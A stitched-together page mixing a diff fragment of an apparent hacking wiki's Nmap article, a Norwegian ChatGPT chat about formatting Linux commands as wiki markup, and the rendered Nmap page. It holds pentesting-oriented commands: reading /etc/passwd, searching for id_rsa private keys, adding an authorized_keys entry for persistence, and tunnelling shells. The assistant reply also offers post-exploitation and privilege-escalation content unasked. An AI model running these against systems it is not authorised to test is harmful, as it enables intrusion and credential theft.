=== <span id="ex-oX"></span>Save Output (XML) ===
Line 842: Line 157:
nmap -oX output.xml 192.168.1.1
nmap -oX output.xml 192.168.1.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-sL"></span>List Targets Only ===
=== <span id="ex-sL"></span>List Targets Only ===
Line 848: Line 163:
nmap -sL 192.168.1.0/30
nmap -sL 192.168.1.0/30
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


=== <span id="ex-d"></span>Debug Mode ===
=== <span id="ex-d"></span>Debug Mode ===
Line 854: Line 169:
nmap -d 192.168.1.1
nmap -d 192.168.1.1
</syntaxhighlight>
</syntaxhighlight>
''[[#options|↑ Options]]''
''[[#options|↑ Options]]''


== See Also ==
== See Also ==
* [[Masscan]]
* [[Masscan]]
* [[Netcat]]
* [[Netcat]]
Line 862: Line 177:
* [[Amass]]
* [[Amass]]
* [[NSE Scripts]]
* [[NSE Scripts]]
Omgjør detet om til linux kommandoer i wiki format:
id name description usage_info category textarea Actions
24
ssh
Connect to host as user
ssh user@host
SSH (Secure Shell)
[title]Getting Started with SSH[/title]
[txt]SSH is a secure and flexible tool for accessing remote machines. It allows you to control systems, move data, and set up tunnels. Everything starts with understanding how to connect, and from there, you can build more advanced techniques.[/txt]
[title]Basic Connections[/title]
[txt]To connect to a system over SSH, use a username and an IP address or hostname.[/txt]
[terminal]
ssh user@target
[/terminal]
[txt]If SSH runs on a different port, add the -p flag:[/txt]
[terminal]
ssh -p 2222 user@target
[/terminal]
[txt]To run a single command and get output without opening a full shell:[/txt]
[terminal]
ssh user@target 'uname -a'
[/terminal]
[title]Tunneling and Pivoting[/title]
[box]
[box-title]Local Port Forwarding[/box-title]
[box-description]Access internal services on the target’s network from your local machine.[/box-description]
[terminal]
ssh -L 8080:localhost:80 user@target
[/terminal]
[txt]Now you can visit http://localhost:8080 to reach the target’s internal port 80.[/txt]
[/box]
[box]
[box-title]Remote Port Forwarding[/box-title]
[box-description]Allow the target machine to access your local service.[/box-description]
[terminal]
ssh -R 9000:localhost:9000 user@target
[/terminal]
[txt]The target can now connect to localhost:9000 and reach your local machine.[/txt]
[/box]
[box]
[box-title]Dynamic Port Forwarding (SOCKS Proxy)[/box-title]
[box-description]Turn the SSH session into a SOCKS proxy for routing traffic.[/box-description]
[terminal]
ssh -D 1080 user@target
[/terminal]
[txt]Set your browser or proxychains to use SOCKS5 on localhost:1080 for routing traffic through the target.[/txt]
[/box]
[title]Transferring Files with SCP[/title]
[box]
[box-title]Download a file from target[/box-title]
[terminal]
scp user@target:/etc/passwd ./passwd_copy
[/terminal]
[/box]
[box]
[box-title]Upload a file to target[/box-title]
[terminal]
scp exploit.sh user@target:/tmp
[/terminal]
[/box]
[title]Key-Based Access and Persistence[/title]
[txt]Store your public key on the target to log in without a password:[/txt]
[terminal]
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
[/terminal]
[txt]Create a local SSH config for faster access:[/txt]
[terminal]
echo -e "Host target\n HostName 10.0.0.1\n User user\n Port 22" >> ~/.ssh/config
[/terminal]
[title]Agent Forwarding[/title]
[txt]Forward your SSH agent to the target to reuse your credentials on other systems:[/txt]
[terminal]
ssh -A user@target
[/terminal]
[txt]Use this to access trusted systems from the target without re-entering your key.[/txt]
[title]Spawning Shells[/title]
[box]
[box-title]Open a direct shell on the remote system[/box-title]
[terminal]
ssh user@target /bin/bash -i
[/terminal]
[/box]
[box]
[box-title]Create a reverse tunnel shell[/box-title]
[terminal]
ssh -R 4444:localhost:4444 user@yourhost
[/terminal]
[txt]This tunnels port 4444 on the target back to your machine.[/txt]
[/box]
[title]Checking SSH Details[/title]
[box]
[box-title]View authorized keys[/box-title]
[terminal]
cat ~/.ssh/authorized_keys
[/terminal]
[/box]
[box]
[box-title]List active SSH connections[/box-title]
[terminal]
ss -tnp | grep sshd
[/terminal]
[/box]
[box]
[box-title]Search for private keys[/box-title]
[terminal]
find / -name "id_rsa" 2>/dev/null
[/terminal]
[/box]
[title]Conclusion[/title]
[txt]SSH is more than a remote login tool. It's a versatile utility for communication, persistence, tunneling, and transfer. Mastering SSH opens a path to full control of your environment, one connection at a time.[/txt]
22
history
Display a list of previously executed commands.
history
Help and Documentation
21
echo
Display a message or write to a file.
echo "Hello, World!" > file.txt
Help and Documentation
20
man
Display the manual for a command.
man COMMAND
Help and Documentation
19
curl
Retrieve data from a URL or API.
curl URL
Networking
18
ping
Sends ICMP echo requests to test network connectivity.
ping [OPTIONS] destination
Networking
[title]Options[/title]
[list]
[li]-c [COUNT] : number of packets to send[/li]
[li]-i [SECONDS] : interval between packets[/li]
[li]-t [TTL] : set time-to-live for packets[/li]
[li]-W [SECONDS] : time to wait for a reply[/li]
[li]-s [SIZE] : specify number of data bytes to be sent[/li]
[li]-q : quiet output (summary only)[/li]
[li]-D : print timestamp before each line[/li]
[li]-4 : use IPv4 only[/li]
[li]-f : flood ping (send packets as fast as possible)[/li]
[li]-6 : use IPv6 only[/li]
[/list]
[title]Examples[/title]
[box]
[box-title]ping -f 8.8.8.8[/box-title]
[txt]Send packets rapidly to test network saturation (requires root)[/txt]
[terminal]
$ sudo ping -f 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
...................................................................
--- 8.8.8.8 ping statistics ---
500 packets transmitted, 500 received, 0% packet loss
[/terminal]
[/box]
[box]
[box-title]ping -c 4 google.com[/box-title]
[txt]Ping a host with 4 packets[/txt]
[terminal]
$ ping -c 4 google.com
PING google.com (142.250.74.14) 56(84) bytes of data.
64 bytes from 142.250.74.14: icmp_seq=1 ttl=117 time=12.3 ms
64 bytes from 142.250.74.14: icmp_seq=2 ttl=117 time=11.9 ms
64 bytes from 142.250.74.14: icmp_seq=3 ttl=117 time=12.1 ms
64 bytes from 142.250.74.14: icmp_seq=4 ttl=117 time=11.8 ms
--- google.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
[/terminal]
[/box]
[box]
[box-title]ping -i 0.5 8.8.8.8[/box-title]
[txt]Ping a host with 0.5 second interval[/txt]
[terminal]
$ ping -i 0.5 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=118 time=14.6 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=118 time=14.5 ms
[/terminal]
[/box]
[box]
[box-title]ping -t 5 example.com[/box-title]
[txt]Set the TTL (time-to-live) value to 5[/txt]
[terminal]
$ ping -t 5 example.com
PING example.com (93.184.216.34) 56(84) bytes of data.
64 bytes from 93.184.216.34: icmp_seq=1 ttl=5 time=30.2 ms
[/terminal]
[/box]
[box]
[box-title]ping -W 2 example.com[/box-title]
[txt]Wait up to 2 seconds for a reply[/txt]
[terminal]
$ ping -W 2 example.com
PING example.com (93.184.216.34) 56(84) bytes of data.
64 bytes from 93.184.216.34: icmp_seq=1 ttl=54 time=28.1 ms
[/terminal]
[/box]
[box]
[box-title]ping -s 1000 example.com[/box-title]
[txt]Send packets with 1000 bytes of data[/txt]
[terminal]
$ ping -s 1000 example.com
PING example.com (93.184.216.34) 1000(1028) bytes of data.
1008 bytes from 93.184.216.34: icmp_seq=1 ttl=54 time=29.7 ms
[/terminal]
[/box]
[box]
[box-title]ping -q -c 2 example.org[/box-title]
[txt]Send 2 packets quietly and show only summary[/txt]
[terminal]
$ ping -q -c 2 example.org
PING example.org (93.184.216.34): 56 data bytes
--- example.org ping statistics ---
2 packets transmitted, 2 received, 0% packet loss
[/terminal]
[/box]
[box]
[box-title]ping -D example.com[/box-title]
[txt]Print timestamp before each output line[/txt]
[terminal]
$ ping -D example.com
[1683390000.123456] 64 bytes from 93.184.216.34: icmp_seq=1 ttl=54 time=28.6 ms
[/terminal]
[/box]
[box]
[box-title]ping -4 google.com[/box-title]
[txt]Force use of IPv4 for the ping[/txt]
[terminal]
$ ping -4 google.com
PING google.com (142.250.74.14) 56(84) bytes of data.
64 bytes from 142.250.74.14: icmp_seq=1 ttl=117 time=12.1 ms
[/terminal]
[/box]
[box]
[box-title]ping -6 ipv6.google.com[/box-title]
[txt]Force use of IPv6 for the ping[/txt]
[terminal]
$ ping -6 ipv6.google.com
PING ipv6.google.com(2a00:1450:4009:821::200e) 56 data bytes
64 bytes from 2a00:1450:4009:821::200e: icmp_seq=1 ttl=56 time=21.5 ms
[/terminal]
[/box]
17
grep
Search for a specific pattern in file content.
grep PATTERN FILE
Text Processing
16
df
Show available and used disk space.
df -h
System Information
15
chmod
Modify access permissions of files and directories.
chmod MODE FILE
Permissions
14
id
Show the ID information of the current user or another user.
id [USERNAME]
User Management
13
whoami
Show the username of the current user.
whoami
User Management
12
mv
Move or rename a file or directory.
mv SOURCE DEST
File Operations
11
cp
Copy files or directories to a new location.
cp SOURCE DEST
File Operations
10
tail
Show the last lines of a file.
tail FILE
File Operations
9
head
Show the first lines of a file.
head FILE
File Operations
8
less
View the content of large files one screen at a time.
less FILE
File Operations
7
cat
View the content of a file.
cat FILE
File Operations
6
rm
Delete files or directories.
rm [OPTIONS] FILE...
File Operations
5
rmdir
Delete an empty directory.
rmdir DIRECTORY
Navigation
4
mkdir
Create a new directory.
mkdir [OPTIONS] DIRECTORY
Navigation
3
cd
Change the current working directory.
cd [DIRECTORY]
Navigation
2
pwd
Print working directory.
pwd [OPTIONS]
Navigation
hello
1
ls
List directory contents.
ls [OPTIONS] [FILE]...
Navigation
[title]Options[/title]
  [list]
  [li]-L : prints the logical current directory (default)[/li]
  [li]-P : prints the physical directory, resolving symlinks[/li]
ChatGPT said:
Linux-kommandoene er nå strukturert i wiki-format med samme stil og oppdeling som du brukte for Nmap. Seksjoner dekker navigasjon, filoperasjoner, nettverksverktøy, tekstsøk og dokumentasjon – med konkrete kommandoer og eksempler.
Vil du at jeg legger til flere avanserte kommandoer for post-exploitation eller privilege escalation også?
You said:
jeg vil at det skal settes opp på samme måte, der examples er en egen "bås" og når man trykker på kommandoen så linkes det opp som det gjøres i nmap - her ser vi også at i hvert eksempel er det mulighet for å klikke seg tilbake opp til kommandoene
= Nmap =
'''Nmap''' (Network Mapper) is an open‑source utility for network discovery, security auditing, and host fingerprinting. 
It is one of the most widely used tools in active reconnaissance, offering port scanning, OS detection, service versioning, and a powerful scripting interface (Nmap Scripting Engine – NSE).
== <span id="options"></span>Common Options ==
=== Scan Types ===
{| class="wikitable"
! Option !! Description
|-
| [[#ex-sS|<code>-sS</code>]] || TCP SYN scan (stealth mode)
|-
| [[#ex-sT|<code>-sT</code>]] || TCP connect scan (full handshake)
|-
| [[#ex-sU|<code>-sU</code>]] || Scan UDP ports
|-
| [[#ex-sP|<code>-sP</code>]] || Ping scan to discover live hosts (alias for <code>-sn</code>)
|-
| [[#ex-sL|<code>-sL</code>]] || List targets without scanning
|}
=== Host Discovery & Targeting ===
{| class="wikitable"
! Option !! Description
|-
| [[#ex-Pn|<code>-Pn</code>]] || Treat all hosts as online (skip ping)
|-
| [[#ex-p|<code>-p&nbsp;[PORT]</code>]] || Specify port(s) to scan
|-
| [[#ex-iL|<code>-iL&nbsp;[FILE]</code>]] || Input list of hosts from file
|-
| <code>-6</code> || Use IPv6 addresses
|-
| <code>-n</code> || Do not resolve hostnames (skip DNS resolution)
|-
| <code>--exclude [HOST]</code> || Exclude specific host(s) from the scan
|-
| <code>--excludefile [FILE]</code> || Exclude hosts listed in a file
|}
=== Detection & Enumeration ===
{| class="wikitable"
! Option !! Description
|-
| [[#ex-sV|<code>-sV</code>]] || Detect service versions
|-
| [[#ex-O|<code>-O</code>]] || Enable OS detection
|-
| [[#ex-A|<code>-A</code>]] || Aggressive scan: OS detection, version, script scan, traceroute
|-
| [[#ex-script|<code>--script&nbsp;[NAME]</code>]] || Run specific NSE script(s)
|-
| <code>--version-all</code> || Try every version detection method (used with <code>-sV</code>)
|-
| <code>--osscan-guess</code> || Guess OS more aggressively when uncertain
|}
=== Performance & Output ===
{| class="wikitable"
! Option !! Description
|-
| [[#ex-T|<code>-T[0‒5]</code>]] || Timing template (T0 = slow, T5 = fast)
|-
| [[#ex-d|<code>-d</code>]] || Enable debugging output
|-
| [[#ex-oN|<code>-oN&nbsp;[FILE]</code>]] || Save output in normal format
|-
| [[#ex-oX|<code>-oX&nbsp;[FILE]</code>]] || Save output in XML format
|-
|-
| <code>-v</code> || Increase verbosity (can be stacked: <code>-vv</code>, <code>-vvv</code>)
|-
| <code>--reason</code> || Show the reason each port is in its state (e.g. response flags)
|-
| <code>--open</code> || Show only open (or relevant) ports
|}
== Examples ==
=== <span id="ex-sS"></span>SYN Scan ===
<syntaxhighlight lang="bash">
nmap -sS 192.168.1.1
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-sT"></span>TCP Connect Scan ===
<syntaxhighlight lang="bash">
nmap -sT 192.168.1.1
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-sU"></span>UDP Scan ===
<syntaxhighlight lang="bash">
nmap -sU 192.168.1.1
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-sP"></span>Ping Scan ===
<syntaxhighlight lang="bash">
nmap -sP 192.168.1.0/24
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-Pn"></span>Skip Host Discovery ===
<syntaxhighlight lang="bash">
nmap -Pn 192.168.1.100
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-p"></span>Scan Specific Ports ===
<syntaxhighlight lang="bash">
nmap -p 22,80 192.168.1.1
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-A"></span>Aggressive Scan ===
<syntaxhighlight lang="bash">
nmap -A 10.0.0.1
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-O"></span>OS Detection Only ===
<syntaxhighlight lang="bash">
nmap -O 10.0.0.1
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-T"></span>Fast Timing Template ===
<syntaxhighlight lang="bash">
nmap -T5 example.com
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-script"></span>Run NSE Script ===
<syntaxhighlight lang="bash">
nmap --script default example.com
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-iL"></span>Scan From File ===
<syntaxhighlight lang="bash">
nmap -iL targets.txt
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-oN"></span>Save Output (Normal) ===
<syntaxhighlight lang="bash">
nmap -oN output.txt 192.168.1.1
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-oX"></span>Save Output (XML) ===
<syntaxhighlight lang="bash">
nmap -oX output.xml 192.168.1.1
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-sL"></span>List Targets Only ===
<syntaxhighlight lang="bash">
nmap -sL 192.168.1.0/30
</syntaxhighlight>
''[[#options|↑ Options]]''
=== <span id="ex-d"></span>Debug Mode ===
<syntaxhighlight lang="bash">
nmap -d 192.168.1.1
</syntaxhighlight>
''[[#options|↑ Options]]''
== See Also ==
* [[Masscan]]
* [[Netcat]]
* [[dnsenum]]
* [[Amass]]
* [[NSE Scripts]]
ChatGPT said:
ChatGPT can make mistakes. Check important info.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
= Linux Commands =
'''Linux command-line tools''' are the building blocks of interaction, enumeration, file manipulation, and system control during any hacking operation. This page breaks down commonly used Linux commands, their usage, categories, and real-world hacking relevance.
== <span id="basics"></span>Essential Commands ==
=== Navigation ===
{| class="wikitable"
! Command !! Description !! Example
|-
| <code>pwd</code> || Show current working directory || <code>pwd</code>
|-
| <code>cd</code> || Change directory || <code>cd /etc</code>
|-
| <code>mkdir</code> || Create directory || <code>mkdir testdir</code>
|-
| <code>rmdir</code> || Remove empty directory || <code>rmdir testdir</code>
|}
=== File Operations ===
{| class="wikitable"
! Command !! Description !! Example
|-
| <code>ls</code> || List contents || <code>ls -la</code>
|-
| <code>cat</code> || View file contents || <code>cat /etc/passwd</code>
|-
| <code>less</code> || Scrollable file viewer || <code>less file.txt</code>
|-
| <code>head</code> || Show first lines || <code>head -n 10 log.txt</code>
|-
| <code>tail</code> || Show last lines || <code>tail -f log.txt</code>
|-
| <code>cp</code> || Copy file || <code>cp file.txt /tmp/</code>
|-
| <code>mv</code> || Move or rename file || <code>mv old.txt new.txt</code>
|-
| <code>rm</code> || Delete file || <code>rm secrets.txt</code>
|}
=== User Management ===
{| class="wikitable"
! Command !! Description !! Example
|-
| <code>whoami</code> || Print current user || <code>whoami</code>
|-
| <code>id</code> || Show user/group ID || <code>id</code>
|}
=== Permissions ===
{| class="wikitable"
! Command !! Description !! Example
|-
| <code>chmod</code> || Change file permissions || <code>chmod 755 script.sh</code>
|}
=== System Info ===
{| class="wikitable"
! Command !! Description !! Example
|-
| <code>df -h</code> || Disk usage || <code>df -h</code>
|}
== <span id="networking"></span>Networking ==
=== Connectivity Tools ===
{| class="wikitable"
! Command !! Description !! Example
|-
| <code>ping</code> || Send ICMP packets || <code>ping -c 4 google.com</code>
|-
| <code>curl</code> || Fetch URL/API data || <code>curl http://example.com</code>
|-
| <code>ssh</code> || Remote shell access || <code>ssh user@host</code>
|}
== <span id="searching"></span>Search & Output Manipulation ==
=== Text Processing ===
{| class="wikitable"
! Command !! Description !! Example
|-
| <code>grep</code> || Search for patterns || <code>grep root /etc/passwd</code>
|}
== <span id="help"></span>Help & Documentation ==
=== Learning a Command ===
{| class="wikitable"
! Command !! Description !! Example
|-
| <code>man</code> || Show manual page || <code>man nmap</code>
|-
| <code>echo</code> || Output text || <code>echo "Hello" > out.txt</code>
|-
| <code>history</code> || Show command history || <code>history</code>
|}
== Examples ==
=== <span id="ex-ssh"></span>SSH with Custom Port ===
<syntaxhighlight lang="bash">
ssh -p 2222 user@target
</syntaxhighlight>
=== <span id="ex-curl"></span>Fetch a Remote Web Page ===
<syntaxhighlight lang="bash">
curl http://example.com
</syntaxhighlight>
=== <span id="ex-chmod"></span>Make Script Executable ===
<syntaxhighlight lang="bash">
chmod +x exploit.sh
</syntaxhighlight>
=== <span id="ex-grep"></span>Search for Usernames ===
<syntaxhighlight lang="bash">
grep /bin/bash /etc/passwd
</syntaxhighlight>
== See Also ==
* [[Nmap]]
* [[Netcat]]
* [[Basic Windows Commands]]

Revision as of 15:37, 12 May 2025

Nmap

Nmap (Network Mapper) is an open‑source utility for network discovery, security auditing, and host fingerprinting. It is one of the most widely used tools in active reconnaissance, offering port scanning, OS detection, service versioning, and a powerful scripting interface (Nmap Scripting Engine – NSE).

Common Options

Scan Types

Option Description
-sS TCP SYN scan (stealth mode)
-sT TCP connect scan (full handshake)
-sU Scan UDP ports
-sP Ping scan to discover live hosts (alias for -sn)
-sL List targets without scanning

Host Discovery & Targeting

Option Description
-Pn Treat all hosts as online (skip ping)
-p [PORT] Specify port(s) to scan
-iL [FILE] Input list of hosts from file
-6 Use IPv6 addresses
-n Do not resolve hostnames (skip DNS resolution)
--exclude [HOST] Exclude specific host(s) from the scan
--excludefile [FILE] Exclude hosts listed in a file


Detection & Enumeration

Option Description
-sV Detect service versions
-O Enable OS detection
-A Aggressive scan: OS detection, version, script scan, traceroute
--script [NAME] Run specific NSE script(s)
--version-all Try every version detection method (used with -sV)
--osscan-guess Guess OS more aggressively when uncertain

Performance & Output

Option Description
-T[0‒5] Timing template (T0 = slow, T5 = fast)
-d Enable debugging output
-oN [FILE] Save output in normal format
-oX [FILE] Save output in XML format
-v Increase verbosity (can be stacked: -vv, -vvv)
--reason Show the reason each port is in its state (e.g. response flags)
--open Show only open (or relevant) ports

Examples

SYN Scan

nmap -sS 192.168.1.1

↑ Options

TCP Connect Scan

nmap -sT 192.168.1.1

↑ Options

UDP Scan

nmap -sU 192.168.1.1

↑ Options

Ping Scan

nmap -sP 192.168.1.0/24

↑ Options

Skip Host Discovery

nmap -Pn 192.168.1.100

↑ Options

Scan Specific Ports

nmap -p 22,80 192.168.1.1

↑ Options

Aggressive Scan

nmap -A 10.0.0.1

↑ Options

OS Detection Only

nmap -O 10.0.0.1

↑ Options

Fast Timing Template

nmap -T5 example.com

↑ Options

Run NSE Script

nmap --script default example.com

↑ Options

Scan From File

nmap -iL targets.txt

↑ Options

Save Output (Normal)

nmap -oN output.txt 192.168.1.1

↑ Options

Save Output (XML)

nmap -oX output.xml 192.168.1.1

↑ Options

List Targets Only

nmap -sL 192.168.1.0/30

↑ Options

Debug Mode

nmap -d 192.168.1.1

↑ Options

See Also

Retrieved from "https://hackops.wiki/index.php?title=Nmap&oldid=36"